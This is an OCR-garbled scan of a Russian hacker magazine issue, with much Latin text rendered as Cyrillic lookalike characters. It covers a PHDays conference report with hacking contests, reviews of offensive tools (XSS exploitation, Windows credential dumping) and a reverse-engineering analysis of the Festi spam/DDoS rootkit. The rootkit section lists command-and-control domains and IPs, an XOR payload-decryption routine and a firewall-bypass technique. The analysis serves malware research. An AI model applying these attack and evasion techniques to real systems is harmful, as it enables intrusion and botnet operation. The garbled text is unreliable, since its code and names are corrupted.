к участию дополнительных бойцов. Интересно, узнали 
ли об этом организаторы и были ли какие-то санкции. 
Победителем СТР стала питерская команда 1331: Моге, 
которая, к слову, умудрилась найти в ходе соревнований 
О-бау-уязвимость в РгееВЗР. 



СТР ИЗНУТРИ 

Некоторые подроб- 
ности о проработке 
конкурса. В организа- 
ции участвовало около 
40 человек! Сеть была 
развернута на не- 
скольких Е5Х, на них 
были запущены вирту- 
алки на базе РгееВБй, 
под которыми крути- 
лисьіаіГы с уязвимыми 
системами. 



РН0АѴ5 

ЕѴЕВѴЖНЕЯЕ 

Параллельно меропри- 
ятия проводились еще 
на 20 площадках по 
всему миру. На каждой 
были свои доклады, 
конкурсы, иногда даже 
целые СТР. 
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БОЛЬШОЙ КУ$Н 



Этот конкурс оказался одним из самых ярких и привлек внимание 
очень многих, кто занимается практической безопасностью. 
Особенно приятно, что в нем принимали участие многие наши 
авторы. Именно там я впервые встретился в реале с РаіОг'ом, 
написавшим не один классный материал для журнала. Он согласился 
рассказать о конкурсе чуть подробнее. 

«Цель участников, среди которых был и я, состояла во взломе 
специально подготовленной системы дистанционного банковского 
обслуживания. В чем же особенность? Организаторы подготовили 
настоящий банкомате настоящими картами и специально поднятым 
процессингом для вывода денег. Так что каждый участник в 
перспективе мог сразу ощутить результат своей „работы", сняв с 
карты живые деньги (!), которые удалось перевести на свой счет. 
Круто, но как это можно было сделать? 

За день до действа всем участникам раздали флешки с 
исходниками системы, в которых нужно было найти уязвимости. 
Никаких БОЬ- инъекций, ЬРІ/РРІ и прочих традиционных для РНР 
уязвимостей в коде не было — присутствовали уязвимости, которые, 
по словам организаторов, встречаются в ходе пентеста реальных 
ДБО. Для примера вспомню уязвимость в процедуре восстановления 
пароля. Нужно было лишь отправить запрос на сброс пароля и 
брутить код, который генерился следующим нехитрым образом: 

$кеу = тсІ5($1о§іп . гапсІ(1. 250) V. 

Таким немудреным способом можно было достучаться до 
чужого аккаунта. Кажется, именно этот простой баг смогли 
найти все участники. Понятно, что вручную эти уязвимости никто 
не эксплуатировал: в первый день каждый пытался написать 
автоматические сплоиты, а самое интересное началось во второй 
день. Всем участникам предлагалось небольшое время, чтобы с 
использованием найденных уязвимостей слить как можно больше 
денег со счетов в виртуальном ДБО. Причем уязвимости затрагивали 
аккаунты не только виртуальных клиентов, но и других участников 
конкурса. В итоге первое место занял человек под ником бійз, второе 
— Глеб Чербов и Дима Частухин, а третье досталось мне». 





паролей для ЮЗ, они решили посмотреть: в такой ли безопасности 
хранятся пассы. Оказалось, что почти все они не стоят и выеденного 
яйца, а многие даже хранят ключ шифрования в открытом виде. Инте- 
реснейшую ретроспективу парольной защиты представил Александр 
Песляк (многие его знают как Боіаг Оезідпег], автор легендарного 
раззѵѵогсі-кракера .іоНп Ше Ріррег! Будем надеяться, что сможем увидеть 
его среди гостей нашего интервью. Тема 00о5 в исполнении Александра 
Лямина из НідЫоасІ І_аЬ, как всегда, не только приковала внимание, но 
и традиционно превратилась в большую сессию вопросов-ответов. Не 
обошли конференцию и люди, которые занимаются ресерчем вирусов. 
Александр Гостев из Казрегзку І_аЬ решил не рассказывать про бая- 
нистый Пещи, а без подготовки выдал захватывающую страшилку про 
Нате, который был обнаружен буквально накануне. В зал с докладом 
Саши Матросова и Жени Родионова про уязвимости смарт-карт с точки 
зрения банковскихтроянов было не пробиться — пришлось смотреть 
на экране в баре. Федор Ярочкин и Владимир Кропотов представили 
необычный подходдля анализа ботнетов. Вместо реверсинга ботов 
они анализируют 0І\І5-трафик и легко определяют ботов по запросам 
к несуществующим доменам. Получился живой доклад с множеством 
примеров из жизни. Увлекательным опытом обнаружения и устранения 
уязвимостей в сетяхтелекоммуникационных операторов поделился 
Сергей Гордейчик, технический директор компании — организатора 
форума РозШѵе ТесНпоІодіез. Отличный доклад про ХХЕ-атаки с демон- 
страцией О-бау-сплоита прочитал Володя Воронцов. К слову, начинался 
его доклад во второй день в 9 утра, и, когда мы ехали к этому времени, 
думали, что в такую рань едва ли придет много народа. И были приятно 
удивлены: свободных мест в зале почти не было. Не могу не упомянуть 
также выступление главной приглашенной звезды Брюса Шнайера, 
одного из самых известных специалистов по криптографии. И пусть до- 
клад не был сильно техническим, мысли людей такого масштаба всегда 
слушаешь с особым вниманием. 

РЕСПЕКТ 

Главное отличие РНйауз от обычных конференций — это нон-стоп 
активность. Что требуется от хакерской конференции? Глубокие 
технические доклады? Да! Ха к-кон курсы на любой вкус — хоть 
отбавляй. СТР? Кажется, впервые соревнование было органично 
интегрировано в основной ивент (в отличие от обычного сценария, 
когда СТР-щики незаметно живут своей жизнью, что-то там ковыряя 
в уголке]. Конкурс сплоитов? Никита Тараканов показал 0-бау для 
ѴѴіпсІоѵѵз ХР, а Павел Шуваев — в Ю5. Многие скептически относи- 
лись к идее объединить под одной крышей «пиджаки» и «футбол- 
ки». Не уверены по поводу первых, но то, что люди, занимающиеся 
практической безопасностью, получили массу фана, много-много 
общения, классные доклады и непередаваемую атмосферу хакер- 
ской конфы, — нет сомнений. И за это, Розіііѵе ТесИпоІодіез и лично 
все люди, которые принимали участие в организации, вам большой 
респект! НС 
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КОНКУРСЫ 



НАЛИВАЙКА N6 

Что может помешать умелому пентестеру провести успешную 
атаку на веб-приложение, пускай даже защищенное фильтром 
безопасности? Однако в этом конкурсе есть нюанс. Каждые 
пять минутучастникам, на действия которых чаще всего реа- 
гировал ѴѴАР, предлагалось выпить 50 мл крепкого алкоголя. 

А если конкурс никак не удается начать (как оказалось, из-за 
глюкавого свитча), алкоголь ждет, а зрители вокруг кричат: 
«Наливай-ка!». Прокачанное умение трезво мыслить в любой 
ситуации показал Володя Воронцов, кстати, разработчик 
своей продвинутой ѴѴАР'ки. 





СЫГРАТЬ В ЯЩИК 

В конкурсе под названием «Сыграть в ящик» участникам нужно было 
вскрыть два сейфа с ПРЮ-замками, работающими на разных частотах, 
для чего нужно было изготовить дубликат карты. Для работы с низкоча- 
стотной (125 кГц) использовался ІІБВ- ридер АСП1221І ( !ѵ/АСВ-1 2211 ). 
дубликатор КеуМаз1:ег РРО 4 РР ( .Іу/КеуМазіег4 ) и метки на базе чипа 
Т5557 ( ЬіЫѵА5557 ). Высокочастотная метка (13,56 МГц) представляла 
собой карту Мі^аге СІаззіс 1К, а дубликат изготавливался с помощью 
китайского перезаписываемого аналога. Кстати, устройство, которое 
здесь можно было использовать, мы рассматривали в прошлом номере в 
статье «Хакерский чемоданчик». 



ОХОТА НА ЛИС N6 

Известная еще в советские времена 
забава в новом формате. Если в класси- 
ческой «Охоте на лис» участнику нужно 
было найти пять радиопередатчиков в 
лесу, то участникам РРЮауз нужно было 
обнаружить постоянно перемещающийся 
по территории конференции объект (это 
был человек с активной ѴѴі-Рі точкой до- 
ступа, запущенной на АпбгоісІ-смартфоне). 
В результате по территории ОідКаІ ОсІюЬег 
бегало немало людей, в том числе сим- 
патичных девушек, которые в одной руке 
держали направленную антенну, а в другой 
нетбук с запущенным КізтеСом, чтобы от- 
следить расстояние до «лисы». 




ЗА ЭЛЕКТРИЧЕСКОЙ ОВЦОЙ 

Массовые утечки паролей остаются самой популярной темой в инфобезопасности за послед- 
нее время, и организаторы конкурса решили дать наглядную картину различных крипто- 
алгоритмов в конкурсе НазН Риппег. Участникам было предложено 6573 различных хеша 
для взлома. При подсчете очков учитывалось как количество взломанных хешей, так и их 
сложность. Первое место заняла команда Теагбгор, отобранная из состава НазНсаІ (разра- 
ботчики одноименного семейства инструментов), причем один из участников (ХапбгеІ) решил 
участвовать в конкурсе самолично и умудрился занять третье место. В пересчете на баллы 
призеры решили 11% всех задач. Отметим, что нетронутыми остались хеши йЕ5, рНрЬЬЗ, ззИа 
и ѴѴогсІРгезз. Самым часто взламываемым оказался алгоритм ЬДЫ Мападег. 



ОРАИО ТНЕРТ ОРОЫЕ 

Участникам предлагалось менее чем за пол- 
часа захватить один из двух квадрокоптеров 
АР.Огопе, управление которым осуществляется 
со смартфона через ѴѴі-Рі. Если ты уже пред- 
ставил, как перехватывал трафик и пытался 
отреверсить протокол взаимодействия, спешу 
огорчить: есть куда менее хардкорный путь. 
Подключившись к внутренней точке доступа 
девайса, легко обнаруживаешь не закрытый 
паролем ТеІпеС Получив доступ к ОС устройства, 
через ір^аЫез можно было сделать геіесі: того 
устройства, которое осуществляло управление, 
и подключиться к дрону со своего телефона в 
качестве пилота. 
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взлом 



Дмитрий «Ріді» Евдокимов, ОідііаІ Зесигііу кѵѵіиег.сот/еѵсіокітоѵсіз] 



Х-Т00І5 

СОФТ ДЛЯ ВЗЛОМА И АНАЛИЗА БЕЗОПАСНОСТИ 




Автор: 

ІМШиегу 

цки 

діЩиЬ.сот/ЖСІиегу/ 

5сѵІІа 

Система: 

ѴѴіпсІоѵѵз 






Авторы: 

^ап-РіеггеІ_Е51ІЕІІР 

ШагкСосІегЗс) 

іл*і_: 

ѵѵѵѵѵѵ.сіагксотеі-гаі. 

сот/тізсІооІБ.сІс 

Система: 

ѴѴіпсІоѵѵз 




ВОССТАНАВЛИВАЕМ ТАБЛИЦУ 
ИМПОРТОВ 

БсуІІа Ітрогіз Ресопзігисііоп — это утили- 
та для восстановления таблицы импортов 
дампов. Инструмент из новых, но уже успел за- 
воевать популярность. Как пишет сам автор, во 
всех программах для восстановления импорта 
(ІтрРес, СНітрРЕС, Ітрогіз Ріхег и так далее) 
есть недостатки, и он решил сделать свой ин- 
струмент, в котором их не будет. Особенности: 

• встроенный дампер; 

• редактирование РЕ-секций; 

• редактирование кода; 

• правка ІАТ и ОЕР; 

• поддержка х86 и х64; 

• полная поддержка юникода; 

• поддержка плагинов 

(включая плагины от ІтрРес, что осо- 
бенно ценно); 

• отлично работает на ѴѴіпсІоѵѵз 7. 

Программа распространяется с открытыми 
исходными кодами. В качестве дизассемблера 
используется проект сІіБіогт. Обрати внима- 
ние, что ѴѴіпсІоѵѵз ХР х64 имеет некоторые баги 
в АРІ, так что под этой ОС полностью восста- 
новить на 100% правильную таблицу импорта 
невозможно. Разработчик вообще всячески 
рекомендует использовать в качестве рабочей 
системы ѴѴіпсІоѵѵз х64, под которой работает 
сам. 



ЭКСПЛУАТАЦИЯ ХБ5 ВМЕСТЕ 
С МЕТА5РЮІТ 

Тбе Сго55-5іІе Бсгірііпд Ргатеѵѵогк 
(Х55Р) — инструмент для эксплуатации Х55- 
уязвимостей более легким способом. Проект 
Х55Р призван продемонстрировать реальную 
опасность Х55-уязвимостей, упрощая их 
эксплуатацию до простого выбора модулей 
атак. Х55Р позволяет создать канал связи 
с целевым браузером (от Х55-уязвимости) для 
выполнения дальнейших действий. Програм- 
ма реализована в виде модуля для Меіазріоіі 
и тесно интегрирована с ним, но помимо этого 
она имеет и собственный веб-интерфейс, где 
отображается информация о проэксплуатиро- 
ванных целях: 

• ІР-адрес; 

• название браузера; 

• версия браузера; 

• наличие соокіе. 

Благодаря интеграции с Меіазріоіі 
Ргатеѵѵогк возможно легко запускать брау- 
зерные эксплойты из его состава через Х55- 
уязвимости. Также благодаря создаваемому 
Х55Р ТиппеІ возможно действовать от сессии 
жертвы. Для запуска модуля необходима 
команда: 

Іоасі Х55-Р 



Я ЗНАЮ, ЧТО ТЫ ДЕЛАЛ В БРАУЗЕРЕ 

Вгоѵѵзег Рогепзіс ТооІ — простой и очень 
мощный инструмент для извлечения 
информации о действиях пользователя из таких 
браузеров, как Іпіегпеі Ехріогег, Соодіе СЬготе, 
МогіІІа Рігеіюх, РоскМеІІ, Сотосіо йгадоп 
и Орега, всего за несколько секунд. Сначала 
создается набор ключевых слов, по которым 
происходит поиск в истории браузера. Когда 
инструмент находит упоминание ключевого 
слова, он отображает ІІРІ_ и заголовок окна. 
Особенности: 

• быстрое сканирование большинства из- 
вестныхбраузеров; 

• мультипоточность; 

• управление профилями ключевых слов, 
позволяющими сохранитьфильтры; 

• сканированиеархивов с историей; 

• импорт/экспорт результатов в С5Ѵ-формат; 

• статистика по использованию браузеров 
всистеме. 

Программа полностью асинхронна, так что 
никак не влияет на работу пользователя 
с браузером в процессе сканирования. 
Официальный сайтутилиты постоянно 
лежит, но ее легко найти на многочисленных 
зеркалах. Интересно, что разработчиком 
утилиты является создатель небезызвестной 
программы длы скрытного удаленного 
управления ОагкСотеІ РАТТооІ. 
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7 утилит для исследования безопасности 




Автор: 

АгзНап ОаЬігзіадНі 

ЦКІ.: 

сосіе.доодіе. 

сот/р/іаѵазпоор 

Система: 

ѴѴіпсІоѵѵз/ипих 



ШПИОНИМ ЗА ПРОГРАММАМИ НА МѴА 

ЭаѵаЗпоор — программа, предназначенная для анализа Эаѵа- 
приложений. Программа впервые была представлена на конферен- 
ции ВІаск На* * 2010 компанией Азрес* 5есигі*у. Программа произво- 
дит статическую, динамическую инструментацию Эаѵа-приложения 
с целью анализа/модификации работы программы при начале ее 
работы или после присоединения куже запущенной программе, при 
этом не требуется исходных кодов. Взаимодействие с ЭасІ позволяет 
сразу смотреть декомпилированный код приложения. Утилита по- 
зволяет реализовать несколько полезных техник, в том числе: 

• перехват любых методов в виртуальной машине; 

• изменение параметров и возвращаемых значений; 

• внедрение произвольного кода в любой метод; 

• просмотр еще не сериализованных да иных. 

Для перехвата методов имеет гибкий фильтр и просмотрщик 
классов и методов приложения. У программы приятный и по- 
нятный 6111-интерфейс, результаты работы можно выводить как 
в консоль приложения, так и в отдельный файл для дальнейшего 
анализа. 





Автор: 

СНгізІіап Маіпка 

ЦКІ_: 

Боигсеіогде.пеі/ргоі- 

есіз/ѵѵз-аиаскег 

Система: 

ѴѴіпсІоѵѵз/ипих 





Автор: 

Апопутоиз 

цри 

ІаіІз.Ьоит.огд 

Система: 

Ыпих 




ИЗВЛЕЧЬ АУТЕНТИФИКАЦИОННЫЕ 
ДАННЫЕ ИЗ ѴѴШ0ѴѴ5 

Оиагкз РѵѵОитр — новый инструмент с от- 
крытым кодом для сбора различных типов 
учетных данных из операционной системы 
ѴѴіпсІоѵѵз. На текущий момент программа по- 
зволяет извлекать следующие типы аутенти- 
фикационных данных: 

• ЫТ/І_М-хеши локальных 
пользователей + историю; 

• І\ІТ/І_М-хеши доменных 
пользователей + историю из ІЧТ05.СІІ1:; 

• кешированные до мен ные учетные дан- 
ные; 

• Ві*І_оскег-информацию, 
хранимую в ЫТ05.СІІ1:. 

Это первый инструмент, который сочета- 
ет в себе уже известные техники и техники 
извлечения данных из Ві*І_оскег. Программа 
поддерживает для обработки форматы от 
Эобп *Ье Ріррег и 1_0рЬ*Сгаск. Также присут- 
ствует поддержка всех новых ОС из семейства 
ѴѴіпсІоѵѵз: ХР/2003/Ѵіз*а/7/2008/8. На текущий 
момент программа действует только с рабочей 
ОС, но обещают и поддержку извлечения ау- 
тентификационных данных офлайн с образов 
дисков. Обрати внимание, что для работы 
утилиты обязательны права администратора 
в целевой системе. Иначе у нее ничего не 
выйдет. 



ПРОВЕРЯЕМ ВЕБ-СЕРВИСЫ 
НА СТОЙКОСТЬ 

ѴѴ5-А**аскег — модульный фреймворк, на- 
писанный на Эаѵа, для проведения тестов на 
проникновение через веб-сервисы. Про- 
грамма на вход запрашивает путь до ѴѴ50І_ 
(ѴѴеЬ Зегѵісез Оезсгір*іоп І_апдиаде) и извле- 
кает из него всю полезную информацию для 
тестирования: методы с параметрами и так 
далее. Фреймворк является расширяемым 
с помощью плагинов и в своем составе по 
умолчанию имееттри плагина, реализующих 
следующие атаки: 

• 5ідпа*иге ѴѴгарріпд; 

• 50АРАс*іоп 5роо*іпд; 

• ѴѴЗ-АсІсІгеззіпд 5роо*іпд. 

По результатам работы плагинов програм- 
ма сама отображает, какие методы и каким 
атакам подвержены. Помимо этого программа 
также способна в удобном виде отображать 
характеристики: 

• интерфейсов; 

• методов; 

• запросов. 

Программа позволяет автоматически 
и вручную (с нелегитимными данными) форми- 
ровать запросы к веб-сервисам и просматри- 
вать ответы. 



ОС ДЛЯ НАСТОЯЩИХ АМ0ІЧѴМ01І5 

Таііз (ТЬе Атпезіс Іпсодпі*о І_іѵе 5уз*ет) — это 
І_іѵе йѴй или І_іѵе 115В операционная система, 
нацеленная на сохранение конфиденциаль- 
ности и анонимности своего пользователя 
в сети Интернет независимо оттого, где он 
находится и за чьим компьютером сидит. 
Никаких следов не останется, если вы не 
захотите обратного явно. Система базируется 
на йеЫап 6ІМІІ / Ыпих. Таііз распространя- 
ется с несколькими встроенными и зара- 
нее сконфигурированными в соответствии 
с требованиями безопасности приложения- 
ми: веб-браузером, клиентом мгновенных 
сообщений, почтовым клиентом, офисным 
пакетом, редактором изображения и звуков 
и так далее. 

В первую очередь при своей работе 
Таііз опирается на анонимную сеть Тог: все 
программное обеспечение настроено на под- 
ключение через Тог, и прямые (не анонимные) 
соединения блокируются. Таііз при своей 
работе абсолютно не использует жесткий 
диск компьютера, на котором работает, — вся 
обработка данных происходит только в опе- 
ративной памяти, которая очищается после 
выключения компьютера. 

Также система использует большое 
количество криптографических тулз, среди 
которых І.ІІК5, НТТР5 ЕѵегуѵѵЬеге, ОрепРбР, 
ОТР и І\Іаи*іІиз ѴѴіре. 
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МАДОАКЕ 

РАСКАПЫВАЕМ 
ВНУТРЕННОСТИ 
РУТКИТА, НЕ ЗРЯ 
ПРОЗВАННОГО 
«КОРОЛЕМ СПАМА» 

Ре$Іі: 



злобный 




и бестелесный 




Руткит из семейства Гезіі заинтересовал нас 
по многим причинам, но главные из них две. 
Во-первых, по сей день это один из самых 
активных спам-ботов, а во-вторых — этот 
ботнет часто используется для ООо5-атак. К 
тому же это довольно нетипичный экземпляр 
вредоносного ПО, авторы которого подошли 
очень серьезно к процессу его разработки 



□ емейство руткитов Резіі известно с 2009 года и в первую 
очередь прославилось массовыми рассылками спама 
и целенаправленными 00о5-атаками (рис. 1). В начале 
текущего года прошло серьезное обновление ботнета и миграция 
на новые командные серверы (рис. 2). Именно это обновление 
и привлекло наше внимание — слишком многое поменялось. 
Во-первых, изменился протокол взаимодействия с командным 
центром: если раньше это был НТТР с зашифрованным Р05Т- 
ответом, то сейчас это специально разработанный протокол с воз- 
можностью обхода различных защитных средств, анализирующих 
сетевой трафик. Во-вторых, все задания для ботов загружаются 
только в память зараженной машины, и что наиболее интерес- 
но — загружаются они в адресное пространство на уровне ядра 
операционной системы. 



АРХИТЕКТУРА РЕ5ТІ 



Дроппер необходим только для установки основного функционала 
в виде драйвера, который осуществляет всю основную активность. 
На рис. 3 представлен граф вызова функций после выполнения 
точки входа этого драйвера. 

Основной задачей этого модуля является взаимодействие с ко- 
мандным центром и установка дополнительных модулей. 

Нами было замечено два основных дополнительных модуля — 
для рассылки спама и для осуществления ОйоЗ-атак соответ- 
ственно. Свою работу бот начинает с обращения на командный 
центр и получения актуального задания, после чего скачивается 
соответствующий плагин. Все расширения активируются не- 
посредственно из памяти и не сохраняются на диске, что суще- 
ственно затрудняет процесс криминалистической экспертизы, так 
как после выключения компьютера восстановить цели и задачи 
конкретного бота практически невозможно. 

Еще одной интересной особенностью этого бота является то, что 
он написан на С++ с использованием ООП. Подобные вещи нечасто 
можно встретить при разработке модулей режима ядра. Основные 
его компоненты (классы): 

• менеджер памяти; 

• собственная реализация сокетов; 

• парсер протокола взаимодействия с С&С; 

• менеджер плагинов. 

Схема взаимодействия между ними изображена на рис. 4. За 
счет разработанного уровня абстракции основное ядро Резіі может 
быть легко портировано под другие операционные системы, в том 
числе отличные от М5 ѴѴіпсІоѵѵз. 
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ЕЕТН1С 

^ким ші7,2*ь 
рс$ті в іт 
ООНЮТ 0^9% 
СУТОАІИ 0^7% 
СІГТЧДЦ4 Я4^% 
*НЕ<3 *2Л44 
ОТМЕР 1 ЗФиЙ’СЕ'І пп.оъ 



Рис. 1. По статистике М86 Бесигііу 
ботнет Резіі занимает почетное третье место 



СИСТЕМА ПЛАГИНОВ 



Наибольший интерес представляют сами плагины, так как именно при 
помощи них выполняются задания, полученные от командного центра. 
Система плагинов реализована по принципу массива указателей на 
специально определенные структуры. 

Структура описывает плагин и протокол обмена данными с ним. 
Восстановленный в процессе обратного анализа вариант структуры 
выглядит следующим образом: 

5-ЕгисЬ Р ШОіііМІІМТЕКГАСЕ 

// Іпіігіаііге рісщіп 

РѴОІР ІпгЫаІіге; 

// Кеіеазе рііщіп. рег-Рогш сіеапир орегаІііопБ 
РѴОЮ Кеіеазе; 

// беі: ріи^іп ѵегзіоп Іп-Рогшаіііоп 

РѴОЮ Се1:Ѵег5ІопІп-Ро_1; 

// Сеі: ріи^іп ѵегзіоп Іп-Рог т аіііоп 
РѴОІР 6е1:Ѵег5ІопІп-Ро_2: 

// Ыгіііе рііщіп зресібс іп-Рогта1:іоп іпііо Ііср зіігеат 
РѴОЮ ІлІгіІеІпІоТсрБ-Ігеат; 

// КеасІ ріи^іп зресібс Іп-Рогтаіііоп -Ргот Ііср зітііеат 

// апсі рагзе сіаііа 

РѴОЮ КеасІРготТср51:геат; 

// Йезегѵесі беМз 

РѴОІР КезегѵесІІ; 

РѴОЮ КезегѵесІ_2; 



Когда бот передает данные в командный центр, выполняется об- 
работка плагинов и активируется функция ѴѴгіІеІпІоТсрБігеатО для 
каждого зарегистрированного плагина. При получении данных с сер- 
вера выполняется другая функция — РеабРготТср5ігеат(). Структура 
данных, передаваемых по сети, представлена на рис. 7. 

Взаимодействие с плагинами обеспечивает менеджер плаги- 
нов, который загружает соответствующий плагин и отвечает за его 
корректное выполнение. Каждый плагин содержит две экспорти- 
руемые функции: 



• РШ6ІІ\1_ІІ\ІТЕРРАСЕ*СгеаІеМосІиІе(РѴ0Ю Огіѵегіпіег^асез) 

• ѴОЮ ОеІеІеМосМеП. 

Полный цикл загрузки плагина можно увидеть на рис. 8. 



СЕТЕВОЙ ПРОТОКОЛ 



В Резб реализован собственный защищенный от перехвата прото- 
кол. Ботнет использует клиент-серверную топологию с несколькими 
командными центрами. Например, один отвечаетза раздачу зада- 
ний на рассылку спама, а другой только за проведение ОйоВ-атак. 
Сетевой протокол работает в нескольких фазах: 

• инициализация — получение ІР-адресов активных 
командных центров; 

• активация — получение текущего задания 
из командного центра. 

В первой фазе осуществляется запрос на заранее указанные 
0І\І5-серверы с целью получения ІР-адресов для указанных до- 
менов, которые хранятся в качестве констант в теле самого бота. 

В фазе активации происходит взаимодействие по протоколу ТСР, 
получается текущее задание и плагин. 

Протокол для второй фазы состоит из заголовка сообщения и 
непосредственно буфера с самим плагином. В буфере содержатся 
данные с тег-ориентированным протоколом (чем-то похож на ХМІ_), 
раздел данных, содержащий непосредственно плагин, зашифро- 
ван следующим алгоритмом: 







Аиіитп 2011 




Ведіппіпд 2012 


ѵіІТигТ.ги 

руаІосГіек.ги 


С&С тідгаііоп 


тисіиск.ги (173.212.248.51) 
тосіиск.ги (173.212.248.51) 


ѵаісіізріі.ги 




гедГіозОп.ги (178.162.179.47) 
Ьозіікагед.ги (178.162.179.47) 







Рис. 2. Миграция руткита на новые командные серверы 




РУТКИТ РЕ5ТІ ДОВОЛЬНО 
НЕТИПИЧНЫЙ ЭКЗЕМПЛЯР 
ВРЕДОНОСНОГО ПО. АВТОРЫ 
ОЧЕНЬ СЕРЬЕЗНО ПОДОШЛИ 
К ПРОЦЕССУ ЕГО РАЗРАБОТКИ 




Рис. 4. Взаимодействие между компонентами руткита 
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МАШАКЕ 



ѴУіп32/РезІі 

Огоррег 


ІпзІаІІ кегпеі- 1 

1 






т 

ѴУіп32/РезІі 

кегпеі-тосіе 




г 


сігіѵег 

1 




ѴѴіпЗг/РезІі 
РІидіп 1 


ѴѴіпЗг/РезІі 
РІидіп 2 


ѴѴіп32/РезІі 

• •• РІидіп N 



Рис. 5. Руткит начал работу! 

кеу = (0x17, ѲхГВ, 0x71,0x50 
сіе-р сіесг сіаііа ( сіаііа ) : 

-Рог іх іп хгап§е(1еп(сІа1:а) ) : 
с!а1:а[іх] _^_= кеуХіх % 4] 



ОБХОД НІР5 И МЕЖСЕТЕВЫХ ЭКРАНОВ 



Одна из интересных особенностей Резіі — обход защитных 
средств, установленных на зараженном компьютере. Резіі 
встраивается уровнем ниже, чем это реализуется в стандартных 
драйверах N015, которые работают на канальном уровне. Для 
отправки или приема сетевых пакетов открываются непосред- 
ственно устройства \Оеѵісе\Тср или \Оеѵісе\ІІсІр в зависимости от 
типа протокола. В большинстве персональных межсетевых экра- 
нов или НІР5 реализовано наблюдение через перехват запросов 
ІРР_|ѵи_СРЕАТЕ_РІІ_Е, которые направляются транспортному 
драйверу открытого устройства. Этот способ позволяет также 
установить процесс, от которого было инициировано сетевое 
взаимодействие. 




Рис. 6. Реализация системы плагинов 



ІИ ТВ 













НІі-іДіПІ 

СЧГІ 


РІіЫчПУ 

Е№И 


Іга.Ііпй 





Рис. 7. Структура передаваемых по сети данных 

Подобный мониторинг можно реализовать двумя способами: 

• установить хук на ІѵѵСгеаІеРіІе для мониторинга всех попыток 
открытия устройства; 

• непосредственно аттач на\Оеѵісе\Тср или\Оеѵісе\ІІсІр для 
перехвата всех ІРР-запросов. 

Резіі для обхода подобного мониторинга собственными силами 
реализует функцию 2ѵѵСгеаІеРіІе(], практически дублируя ее (схему 
реализации функции 2ѵѵСгеаІеРіІе() см. на рис. 9). 

Из представленной схемы видно, что Резіі создает объект связи 
с устройством и напрямую посылает запросы I РР_М Э_СР Е АТЕ 
транспортному драйверу. Таким образом, все защитное ПО, от- 
слеживающее устройства \Оеѵісе\Тср или \Оеѵісе\ІІсІр, пропустит 
запросы от бота. Для прямого взаимодействия с устройствами 
\йеѵісе\Тср или \Оеѵісе\ІІсІр вредоносной программе нужны ука- 
затели к соответствующим объектам устройств (беѵісе о^ес^з]. 

Для получения указателя на Тсрір.зуз на объект драйвера можно 
использовать: 



ОетТфГЮ 

рІиціл 

I 



мар ціи^іп іглвде іл№ 

Бузіета «кіг«5 ірасе 



ІпіІраІІ2Ё ЬАТапсІ арріу 

іо тарркі Ітз^ 

1 



Ееі екроПей гоиМпез: 

СггаІеМрсІиІр Й Ор&ірМпгіиІР- 



ЕхЫиІС' 

)І4(ІПР 



йптар рІУВІ 14 







йи* рІи^іП !□ & ѵег$г№ іп 1ц 




1 








Ксдіііег рЕи^ігъЬу Ій 





Ехесиіе ОЬСгеаІеОЬіесІ 
Іо сгеаіе ЛІе оЬіес* 



Іпіііаіііе зесигКуаигіЬиІез о{ 
сгеаіесі \\\е оЬІес* 



Ехесиіе ОЫпзегЮЬіесІ Іо іпзегі: 
сгеаіесі біе оЬіес! іпіо 
РИЕ ОВЦЕСТ Іуре Іізі 



Сгеаіе ІРР гециезІѵѵіЩ 
МаіогРипсІіоп сосіе зеі Іо 
ІРР М^ СРЕАТЕ 



ЗепсІ сгеаіесі ІРР гециезі сіігесііу 
Іо Ісрір.зуз сігіѵег 



ЗАЩИТА РЕ5ТІ 



Резіі периодически 
проверяет наличие 
отладчика при помощи 
вызова функции КсШеЬид- 
дегЕпаЫесШ, а также умеет 
снимать аппаратные точки 
останова, устанавливая 
в них нулевое значение. 



Рис. 8. Полный цикл загрузки плагина 



Рис. 9. Зловредная реализация функции 2ѵѵСгеаІеРіІе() 
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Рис. 11. Процедура, обрабатывающая список ТСР- и ІІОР-устройств 




ЕТАИСТ к 1 ЕІяпкРІ ЁГаг^ТАііСТ I 3 «Ігііічу 

< 

■ітіцсі_*_й // 

ѴІ ■ ІПІ5.Г 

ііій-^ѵТлЫр - ве'івеІіР-Г^ѵ^Гл-ЬІ^' 

іМз-ЬЬгисЬШ - I* 1 “ " 

ІІй-&->Й?иісе1ср - й; 
е - >о еіііз і» ■ ®; 
ьий_1РйЬЧБІПіь ^йігисМі)? 
чла_іэг??(лиі эчггисг?}; 

ѵ1->5йі:ке*:ИипІ]і?г * Й; 

-> Верно ■* В; 
геіигп ѵ1 ; 



Рис. 13. Пример конструктора класса СБоскеІ 



ІМТ5ТА Ш5 

ОЬКе-РегепсеОЬ]ес1:ВуМате ( 

ІМ РІШІСОРЕ 5ТКІМ6 ОЬіесІіМате . 

ІЫ ІЛ.ОМ6 А1=1=гіЬи1=е5. 

ІМ РАССЕ 55 _ 5Т АТЕ АссеззЗІіа ^е ОРІІОМи 
ІМ АССЕ55_МА5К РевігесІАссезБ ОРТІОМи 
ІМ РОВІЕСТ_ТУРЕ ОЬ^есГГуре, 

ІМ КРКОСЕ55(Ж_М(ЮЕ АссеззМосІе, 

ІМ ОШ РѴОІР РагзеСоп1=ех1= ОРТтМА!.. 

ОІІТ РѴОЮ *ОЬ]'ес1: 



Это недокументированная системная функция, получающая в 
качестве одного из параметров юникод-строку с именем устрой- 
ства. Резіі осуществляет итерацию по всему списку устройств, 
чтобы найти нужное соответствие. Восстановленный код этой про- 
цедуры представлен на рис. 11. 



ПРОБЛЕМЫ АНАЛИЗА 00П-К0ДА 



Анализ несколько затруднило присутствие ООП-кода, так как со- 
временные инструменты обратного анализа и даже ЮА не умеют 
эффективно его восстанавливать. К примеру, восстановление 
графа потока управления в С++ усложняется полиморфизмом на 
уровне виртуальных функций, что показано на рис. 12. 

Сложность заключается в точном получении адреса процеду- 
ры, которая будет вызвана. Статический анализ не дает информа- 
ции о том, куда будет указывать регистр ЕАХ. Для того чтобы по- 
лучить адрес, нужно выяснить, где создается объект указанного 
типа, а это происходит непосредственно в процессе выполнения, 
и именно тогда инициализируется указатель на таблицу вирту- 
альных методов. 

На рис. 13 приведен пример конструктора класса СБоскеІ, реа- 
лизованного в Резіі. Видно, что происходит непрозрачный вызов и 
инициализация указателя С5оскеІ::ѵТаЫе на таблицу виртуальных 
методов. 



В КАЧЕСТВЕ ЗАКЛЮЧЕНИЯ 



Руткит Резіі довольно нетипичный экземпляр вредоносного 
ПО, авторы которого подошли очень серьезно к процессу его 
разработки. Они предусмотрели множество нюансов, которые 
обеспечивают незаметное присутствие этого бота в системе 
